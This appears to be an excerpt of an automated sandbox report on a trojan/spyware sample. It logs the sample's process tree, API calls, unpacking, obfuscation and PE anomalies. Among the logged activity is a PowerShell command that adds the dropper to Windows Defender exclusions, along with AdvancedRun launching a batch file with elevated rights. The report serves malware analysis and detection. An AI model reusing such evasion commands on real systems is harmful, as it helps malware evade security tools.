Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9145D0 RtlGetThreadWorkOnBehalfTicket,RtlGetThreadWorkOnBehalfTicket,ZwQueryInformationThread, 29_2_6A9145D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595D0 ZwClose, 29_2_6A9595D0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFDD3 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9CFDD3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A914DC0 RtlpUnWaitCriticalSection,RtlWakeAddressAllNoFence,RtlRaiseStatus,TpWaitForAlpcCompletion,RtlpUnWaitCriticalSection,ZwSetEvent,TpWaitForAlpcCompletion,ZwAlpcQueryInformation, 29_2_6A914DC0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595C0 ZwSetEvent, 29_2_6A9595C0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A93EDC4 ZwCancelWaitCompletionPacket, 29_2_6A93EDC4
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9195F0 TpSetPoolMinThreads,ZwSetInformationWorkerFactory,RtlGetCurrentServiceSessionId,TpSetPoolMinThreads, 29_2_6A9195F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9595F0 ZwQueryInformationFile, 29_2_6A9595F0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CBDFA RtlAcquireSRWLockExclusive,ZwAllocateVirtualMemory,RtlReleaseSRWLockExclusive, 29_2_6A9CBDFA
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959DE0 ZwAssociateWaitCompletionPacket, 29_2_6A959DE0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A95AD10 ZwSetCachedSigningLevel, 29_2_6A95AD10
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D0B ZwSetInformationProcess, 29_2_6A9A1D0B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E8D34 RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A9E8D34
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A944D3B memset,RtlRunOnceExecuteOnce,ZwTraceControl,memcmp,RtlNtStatusToDosError,RtlFreeHeap,RtlAllocateHeap,RtlNtStatusToDosError,RtlFreeHeap, 29_2_6A944D3B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A941520 RtlInitializeCriticalSectionEx,RtlInitializeCriticalSectionEx,RtlGetCurrentServiceSessionId,ZwTraceEvent, 29_2_6A941520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959520 ZwWaitForSingleObject, 29_2_6A959520
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9CFD22 ZwQueryInformationProcess,RtlUniform, 29_2_6A9CFD22
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9E1D55 ZwFreeVirtualMemory,RtlWakeAddressAllNoFence, 29_2_6A9E1D55
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D43 ZwQueryInformationThread, 29_2_6A9A1D43
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A940548 RtlEnterCriticalSection,RtlLeaveCriticalSection,RtlRbInsertNodeEx,ZwQueryVirtualMemory, 29_2_6A940548
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A959D70 ZwAlpcQueryInformation, 29_2_6A959D70
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1570 ZwQuerySystemInformation,RtlInitUnicodeString,memset,ZwAlpcConnectPort,ZwAlpcSendWaitReceivePort,ZwClose, 29_2_6A9A1570
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9A1D6A ZwWaitForMultipleObjects, 29_2_6A9A1D6A
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A9D6D61 ZwAllocateVirtualMemoryEx, 29_2_6A9D6D61
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401915 Sleep,NtTerminateProcess, 33_2_00401915
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402040 NtQuerySystemInformation, 33_2_00402040
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402242 NtQuerySystemInformation, 33_2_00402242
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402313 NtOpenKey, 33_2_00402313
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401921 Sleep,NtTerminateProcess, 33_2_00401921
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401931 Sleep,NtTerminateProcess, 33_2_00401931
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402535 NtEnumerateKey, 33_2_00402535
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401938 Sleep,NtTerminateProcess, 33_2_00401938
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401FD8 NtQuerySystemInformation,LocalAlloc,NtQuerySystemInformation,NtQuerySystemInformation,NtQuerySystemInformation, 33_2_00401FD8
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401FFE NtQuerySystemInformation,LocalAlloc, 33_2_00401FFE
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402190 NtQuerySystemInformation, 33_2_00402190
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401493 NtAllocateVirtualMemory, 33_2_00401493
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_0040199B Sleep,NtTerminateProcess, 33_2_0040199B
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004021B5 NtQuerySystemInformation, 33_2_004021B5
Source: 32BC.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 7428.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 192F.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6DDE.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8E8B.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 5D4.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 86B8.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 75B0.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 89D7.exe.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: sfiueca.7.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: SkB6zJ6H3N.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\cviueca
Source: 1105.tmp.29.dr Binary string: \Device\IPT
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@40/37@64/12
Source: C:\Users\user\AppData\Local\Temp\5D4.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00401306 OpenServiceW,CloseServiceHandle,QueryServiceStatus,StartServiceW,CloseServiceHandle,CloseServiceHandle, 32_2_00401306
Source: SkB6zJ6H3N.exe Joe Sandbox Cloud Basic: Detection: clean Score: 0
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_0040A33B FindResourceW,SizeofResource,LoadResource,LockResource, 32_2_0040A33B
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: unknown Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Process created: C:\Users\user\AppData\Local\Temp\97A5.exe C:\Users\user~1\AppData\Local\Temp\97A5.exe
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: unknown Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Users\user\AppData\Roaming\cviueca Process created: C:\Users\user\AppData\Roaming\cviueca C:\Users\user\AppData\Roaming\cviueca
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\5D4.exe C:\Users\user~1\AppData\Local\Temp\5D4.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\EDD.exe C:\Users\user~1\AppData\Local\Temp\EDD.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\192F.exe C:\Users\user~1\AppData\Local\Temp\192F.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\319A.exe C:\Users\user~1\AppData\Local\Temp\319A.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\69B5.exe C:\Users\user~1\AppData\Local\Temp\69B5.exe
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Process created: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe' /SpecialRun 4101d8 4288
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\32BC.exe C:\Users\user~1\AppData\Local\Temp\32BC.exe
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\5D4.exe' -Force
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe' /EXEFilename 'C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\test.bat' /WindowState ''0'' /PriorityClass ''32'' /CommandLine '' /StartDirectory '' /RunAs 8 /Run
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Process created: C:\Users\user\Desktop\SkB6zJ6H3N.exe 'C:\Users\user\Desktop\SkB6zJ6H3N.exe'
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\319A.exe Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\3c9b9832-1586-402f-8df1-a3ced6cc50c2\AdvancedRun.exe Process created: unknown unknown
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 32_2_00408FC9
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 35_2_00408FC9 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueW,GetProcAddress,AdjustTokenPrivileges,GetLastError,FindCloseChangeNotification, 35_2_00408FC9
Source: C:\Windows\explorer.exe File created: C:\Users\user~1\AppData\Local\Temp\97A5.tmp
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr Binary or memory string: INSERT INTO [dbo].[Details] ([Employee Id], [Title], [First Name], [Last Name], [Email], [Phone Number], [Hire Date], [Date of Birth], [Basic Pay], [House Rental Allowance], [Dearness Allowance], [Provident Fund], [Date of Leaving], [Grade]) VALUES (@Employee_Id, @Title, @First_Name, @Last_Name, @Email, @Phone_Number, @Hire_Date, @Date_of_Birth, @Basic_Pay, @House_Rental_Allowance, @Dearness_Allowance, @Provident_Fund, @Date_of_Leaving, @Grade);
Source: sqlite3.dll.36.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr Binary or memory string: UPDATE [dbo].[Details] SET [Employee Id] = @Employee_Id, [Title] = @Title, [First Name] = @First_Name, [Last Name] = @Last_Name, [Email] = @Email, [Phone Number] = @Phone_Number, [Hire Date] = @Hire_Date, [Date of Birth] = @Date_of_Birth, [Basic Pay] = @Basic_Pay, [House Rental Allowance] = @House_Rental_Allowance, [Dearness Allowance] = @Dearness_Allowance, [Provident Fund] = @Provident_Fund, [Date of Leaving] = @Date_of_Leaving, [Grade] = @Grade WHERE (([Employee Id] = @Original_Employee_Id) AND ([Title] = @Original_Title) AND ([First Name] = @Original_First_Name) AND ([Last Name] = @Original_Last_Name) AND ((@IsNull_Phone_Number = 1 AND [Phone Number] IS NULL) OR ([Phone Number] = @Original_Phone_Number)) AND ([Hire Date] = @Original_Hire_Date) AND ([Date of Birth] = @Original_Date_of_Birth) AND ([Basic Pay] = @Original_Basic_Pay) AND ((@IsNull_House_Rental_Allowance = 1 AND [House Rental Allowance] IS NULL) OR ([House Rental Allowance] = @Original_House_Rental_Allowance)) AND ((@IsNull_Dearness_Allowance = 1 AND [Dearness Allowance] IS NULL) OR ([Dearness Allowance] = @Original_Dearness_Allowance)) AND ((@IsNull_Provident_Fund = 1 AND [Provident Fund] IS NULL) OR ([Provident Fund] = @Original_Provident_Fund)) AND ((@IsNull_Date_of_Leaving = 1 AND [Date of Leaving] IS NULL) OR ([Date of Leaving] = @Original_Date_of_Leaving)) AND ([Grade] = @Original_Grade));
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: sqlite3.dll.36.dr Binary or memory string: UPDATE %Q.%s SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: sqlite3.dll.36.dr Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: C:\Users\user\AppData\Local\Temp\5D4.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\EDD.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\319A.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_004095FD CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,CloseHandle,Process32NextW,CloseHandle, 32_2_004095FD
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4752:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Command line argument: fam 33_2_0043C2B0
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Command line argument: \H 33_2_0043C2B0
Source: C:\Users\user\AppData\Local\Temp\5D4.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\EDD.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\319A.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Local\Temp\32BC.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Local\Temp\5D4.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\192F.exe File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SkB6zJ6H3N.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\vojos\fuw.pdb source: 192F.exe, 0000001D.00000000.392199023.0000000000417000.00000002.00020000.sdmp, sfiueca.7.dr
Source: Binary string: C:\kelut\takemiv\botuw31-mejosek-li.pdb source: 69B5.exe, 69B5.exe.7.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdbp source: 8E8B.exe.7.dr
Source: Binary string: c:\Projects\VS2005\AdvancedRun\Release\AdvancedRun.pdb source: AdvancedRun.exe, 00000020.00000000.407285900.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 00000023.00000002.433249054.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.454048622.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.31.dr
Source: Binary string: C:\pewa75 firecogiw\gugegowul49\geresegate_micicipu.pdb source: 8E8B.exe.7.dr
Source: Binary string: C:\moliyuwod_vofadarecayu\dezuvacux.pdb source: SkB6zJ6H3N.exe
Source: Binary string: cC:\moliyuwod_vofadarecayu\dezuvacux.pdb` source: SkB6zJ6H3N.exe
Source: Binary string: C:\lewusukoviv.pdb source: 7428.exe.7.dr
Source: Binary string: wntdll.pdbUGP source: 192F.exe, 0000001D.00000002.423561316.000000006A8F1000.00000020.00020000.sdmp, 1105.tmp.29.dr
Source: Binary string: wntdll.pdb source: 192F.exe, 1105.tmp.29.dr
Source: Binary string: XC:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb` source: 32BC.exe.7.dr
Source: Binary string: WC:\kelut\takemiv\botuw31-mejosek-li.pdb` source: 69B5.exe, 00000021.00000000.408654637.0000000000401000.00000020.00020000.sdmp, 69B5.exe.7.dr
Source: Binary string: C:\lewusukoviv.pdb` source: 7428.exe.7.dr
Source: Binary string: C:\tosofom\yopuk.pdb source: 75B0.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb` source: 6DDE.exe.7.dr
Source: Binary string: C:\meyobiti_bigenubixa\zicax4_tupewacuz\mepuyajuyen.pdb source: 32BC.exe.7.dr
Source: Binary string: C:\siyihoy haxuhanetaxohe\xepokupajalo99\lave.pdb source: 6DDE.exe.7.dr

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Local\Temp\192F.exe Unpacked PE file: 29.2.192F.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.cipizi:R;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Unpacked PE file: 33.2.69B5.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
.NET source code contains potential unpacker
Source: 86B8.exe.7.dr, SimplePaint/FrmMain.cs .Net Code: TypeNameBuilder System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_02E11D5B push ds; ret 0_2_02E11D68
Source: C:\Users\user\AppData\Local\Temp\97A5.exe Code function: 19_2_02E80EE3 push ds; ret 19_2_02E80EF0
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E54 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E63 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402665 push cs; ret 29_2_0040266B
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_0040290C push eax; iretd 29_2_0040290D
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E16 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402DC0 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402DD8 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402DE8 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402DF1 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E82 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E85 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402D92 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E95 push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00401D9A pushad ; ret 29_2_00401DA3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_00402E9C push eax; ret 29_2_00402EB3
Source: C:\Users\user\AppData\Local\Temp\192F.exe Code function: 29_2_6A96D0D1 push ecx; ret 29_2_6A96D0E4
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_0040B550 push eax; ret 32_2_0040B564
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_0040B550 push eax; ret 32_2_0040B58C
Source: C:\Users\user\AppData\Local\Temp\0a4fc5b5-fef6-4ac6-8dad-72b92a431021\AdvancedRun.exe Code function: 32_2_0040B50D push ecx; ret 32_2_0040B51D
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401A61 push ds; retf 33_2_00401A69
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401569 push edx; iretd 33_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401569 push edx; iretd 33_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402874 push esp; iretd 33_2_00402875
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401575 push edx; iretd 33_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00402F19 push eax; ret 33_2_00402FEA
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004015D3 push edx; iretd 33_2_004015EB
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_004026D8 push ds; retf 33_2_004026DC
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401580 push edx; iretd 33_2_004015D2
Source: C:\Users\user\AppData\Local\Temp\69B5.exe Code function: 33_2_00401981 push ebx; retf 33_2_00401982
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\SkB6zJ6H3N.exe Code function: 0_2_004267E0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 0_2_004267E0
Binary contains a suspicious time stamp
Source: 8746.exe.7.dr Static PE information: 0xBCDF81AC [Sat May 31 12:18:52 2070 UTC]
PE file contains sections with non-standard names
Source: SkB6zJ6H3N.exe Static PE information: section name: .xemu
Source: 32BC.exe.7.dr Static PE information: section name: .malajew
Source: 192F.exe.7.dr Static PE information: section name: .cipizi
Source: 6DDE.exe.7.dr Static PE information: section name: .vuci
Source: 75B0.exe.7.dr Static PE information: section name: .xoj
Source: 97A5.exe.7.dr Static PE information: section name: .xemu
Source: sfiueca.7.dr Static PE information: section name: .cipizi
Source: cviueca.7.dr Static PE information: section name: .xemu
PE file contains an invalid checksum
Source: EDD.exe.7.dr Static PE information: real checksum: 0x10f50 should be: 0x5be1
Source: 86B8.exe.7.dr Static PE information: real checksum: 0x0 should be: 0x4147a
Source: 5D4.exe.7.dr Static PE information: real checksum: 0x8ddc4 should be: 0x7fd66
Source: 89D7.exe.7.dr Static PE information: real checksum: 0x87179 should be: 0x81f2a
Source: 319A.exe.7.dr Static PE information: real checksum: 0x2bdee should be: 0x3529c
Source: initial sample Static PE information: section name: .text entropy: 6.98541058643
Source: initial sample Static PE information: section name: .text entropy: 6.97994250456
Source: initial sample Static PE information: section name: .text entropy: 7.66779890827
Source: initial sample Static PE information: section name: .text entropy: 7.66469899227
Source: initial sample Static PE information: section name: .text entropy: 7.38549549306
Source: initial sample Static PE information: section name: .text entropy: 7.83179260502
Source: initial sample Static PE information: section name: .text entropy: 7.79620991915
Source: initial sample Static PE information: section name: .text entropy: 7.85713092672
Source: initial sample Static PE information: section name: .text entropy: 7.29655075024
Source: initial sample Static PE information: section name: .text entropy: 7.8779018043
Source: initial sample Static PE information: section name: .text entropy: 7.86113394582

Persistence and Installation Behavior:

Drops files with a non-matching file extension (content does not match file extension)
